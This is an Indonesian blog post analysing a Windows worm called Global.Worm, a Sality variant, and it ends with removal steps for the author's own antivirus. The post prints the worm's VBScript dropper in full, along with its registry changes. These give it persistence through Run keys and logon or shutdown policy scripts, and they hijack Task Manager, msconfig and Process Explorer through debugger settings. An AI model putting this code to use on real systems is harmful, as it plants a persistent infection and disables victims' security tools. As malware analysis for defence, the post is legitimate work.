MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Analisa Global.Worm by Morphic

Posted by Morphic pada September 29, 2008


Ini dia Global.Worm. makan neh hasil analisa.

(BACA: Hasil analisa berikut tidak sepenuhnya benar, mungkin saja saya salah menganalisa!)

Hasil Analisa

Nama Malware : Global.Worm [Morphost], virus.Win32.Sality.z [KasperskyLab], W32.Silly.FDC [Symantec], W32/Sality.ag [McAfee]

Ukuran : 286,720 bytes

Pengirim Virus : ditemukan oleh metode Heuristik Morphost

Icon : icon folder

CRC32 : 55BC6B01 (berdasarkan file yang ditemukan)

MD5 : 67CE8B53CBF5A1D3BF4269748F82ACCA (berdasarkan file yang ditemukan)

Dibuat dengan : Visual Basic

Direktori projek saat pembuatan virus ini adalah:

C:\Documents and Settings\TASDA.TASDA-B20F43BAE\Desktop07\Project1.vbp

Ditemukan script vbs seperti berikut:

dim fs,rg

set fs = createobject(“scripting.filesystemobject”)

set rg = createobject(“wscript.shell”)

on error resume next

rg.regwrite “HKCR\.vbs\”, “VBSFile”

rg.regwrite “HKCU\Control Panel\Desktop\SCRNSAVE.EXE”, ” C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”

rg.regwrite “HKCU\Control Panel\Desktop\ScreenSaveTimeOut”, “30”

rg.regwrite “HKCR\MSCFile\Shell\Open\Command\”, “C:\WINDOWS\pchealth\Global.exe”

rg.regwrite “HKCR\regfile\Shell\Open\Command\”, “C:\WINDOWS\pchealth\Global.exe”

rg.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, “C:\WINDOWS\system32\dllcache\Default.exe”

rg.regwrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\”, “C:\WINDOWS\system32\dllcache\Default.exe”

rg.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”, “C:\WINDOWS\system\KEYBOARD.exe”

rg.regwrite “HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\”, “C:\WINDOWS\Fonts\Fonts.exe”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName”,”Local Group Policy”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath”,””

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID”,”LocalGPO”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName”,”Local Group Policy”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID”,”Local”

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters”,””

rg.regwrite “HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script”,”C:\WINDOWS\Cursors\Boom.vbs”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID”, “LocalGPO”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID”, “Local”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script”, “C:\WINDOWS\Cursors\Boom.vbs”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID”, “LocalGPO”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName”, “Local Group Policy”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID”, “Local”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters”, “”

rg.regwrite “HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script”, “C:\WINDOWS\Cursors\Boom.vbs”

If Not fs.fileexists(“C:\WINDOWS\Fonts\Fonts.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\Fonts\Fonts.exe”)

If Not fs.fileexists(“C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com”)

If Not fs.fileexists(“C:\WINDOWS\pchealth\Global.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\pchealth\Global.exe”)

If Not fs.fileexists(“C:\WINDOWS\system\KEYBOARD.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\system\KEYBOARD.exe”)

If Not fs.fileexists(“C:\WINDOWS\system32\dllcache\Default.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\WINDOWS\system32\dllcache\Default.exe”)

If Not fs.fileexists(“C:\windows\system32\drivers\drivers.cab.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\windows\system32\drivers\drivers.cab.exe “)

If Not fs.fileexists(“C:\windows\media\rndll32.pif “) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\windows\media\rndll32.pif”)

If Not fs.fileexists(“C:\windows\fonts\tskmgr.exe”) Then fs.copyfile (“C:\WINDOWS\Help\microsoft.hlp”), (“C:\windows\fonts\tskmgr.exe”)

Membuat File di:

“C:\windows\system32\dllchace\autorun.inf”

“C;\windows\Cursors\Boom.vbs”

Dan lain-lain

Membuat registry key berikut:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]

NeverShowExt = “1”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]

NeverShowExt = “1”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = “%FontsDir%\Fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

DisableStatusMessages = 0x00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

sys = “%FontsDir%\Fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

(Default) = “%Windir%\system\KEYBOARD.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = “%System%\dllcache\Default.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe]

Debugger = “%System%\drivers\drivers.cab.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe]

Debugger = “%System%\drivers\drivers.cab.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]

Debugger = “%System%\drivers\drivers.cab.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe]

Debugger = “%FontsDir%\fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]

Debugger = “%FontsDir%\Fonts.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]

Debugger = “%Windir%\Media\rndll32.pif”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]

* Debugger = “%Windir%\pchealth\helpctr\binaries\HelpHost.com”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]

Debugger = “%FontsDir%\tskmgr.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

Parameters = “”

Script = “%Windir%\Cursors\Boom.vbs”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

DisplayName = “Local Group Policy”

FileSysPath = “”

GPO-ID = “LocalGPO”

GPOName = “Local Group Policy”

SOM-ID = “Local”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

Parameters = “”

Script = “%Windir%\Cursors\Boom.vbs”

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

DisplayName = “Local Group Policy”

FileSysPath = “”

GPO-ID = “LocalGPO”

GPOName = “Local Group Policy”

SOM-ID = “Local”

[HKEY_CURRENT_USER\Control Panel\Desktop]

SCRNSAVE.EXE = “%Windir%\pchealth\helpctr\binaries\HelpHost.com”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = “%System%\dllcache\Default.exe”

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

Parameters = “”

Script = “%Windir%\Cursors\Boom.vbs”

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

DisplayName = “Local Group Policy”

FileSysPath = “”

GPO-ID = “LocalGPO”

GPOName = “Local Group Policy”

SOM-ID = “Local”

Menghapus registry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = “%SystemRoot%\system32\mmc.exe “%1″ %*”

Memodifikasi registry value:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]

(Default) = “%Windir%\pchealth\Global.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]

ValueName = “ShowSuperHiden”

[HKEY_CURRENT_USER\Control Panel\Desktop]

AutoEndTasks = “1”

ScreenSaveTimeOut = “30”

=============================================================================

Untuk worm ini sudah bisa dibereskan dengan Morphost Antivirus. [NB: Sekarang Morphost udah diperbaharui, jadi silakan download Morphost yang baru.]

Signature worm ini sudah saya masukkan ke dalam database Morphost. Jadi kamu sudah bisa menggunakan Morphost untuk menscan Komputermu dari Global.Worm.

Kalo Global.Worm belum juga pergi dari komputermu. Lakukan langkah berikut:

-Pilih tab settings

-Pilih options ”let users make their database themselves” pada frames “database”

-Lalu masukkan satu saja sampel Global.Worm

-Dan langsung scan!

By: Morphic

http://www.friendster.com/morphic (friendster)

https://morphians.wordpress.com (my blog)

karta_morphic@yahoo.co.id (my email)

http://morphic.4shared.com (download Morphost and Morphost database here!)

and don’t forget to join with MorphostLab (FriendsterGroup)

My thanks go to Anharku, MorphostLab, anak-anak Permata Setia Budi, anak-anak Smansa Medan, anak-anak kelas XII IPA 10 Smansa Medan, and others.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: